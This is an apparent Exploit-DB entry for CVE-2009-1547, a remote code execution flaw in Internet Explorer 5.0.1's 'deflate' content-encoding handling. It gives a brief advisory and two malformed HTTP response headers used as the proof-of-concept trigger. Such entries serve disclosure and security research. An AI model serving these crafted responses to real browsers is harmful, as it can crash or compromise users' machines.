Microsoft Internet Explorer 5.0.1 - 'deflate' HTTP Content Encoding Remote Code Execution Vulnerability

2009-10-13T00:00:00
ID EDB-ID:33270
Type exploitdb
Reporter Skylined
Modified 2009-10-13T00:00:00

Description

Microsoft Internet Explorer 5.0.1 'deflate' HTTP Content Encoding Remote Code Execution Vulnerability. CVE-2009-1547 . Remote exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/36622/info

Microsoft Internet Explorer is prone to a remote code-execution vulnerability.

Attackers can exploit this issue to execute arbitrary code in the context of the user running the application. Successful exploits will compromise the application and possibly the computer. Failed attacks may cause denial-of-service conditions. 

HTTP/.\nContent-Encoding:deflate\r\t\n\r\n\x20\x20

HTTP \nContent-Encoding:deflate\nContent-Range:\n\n”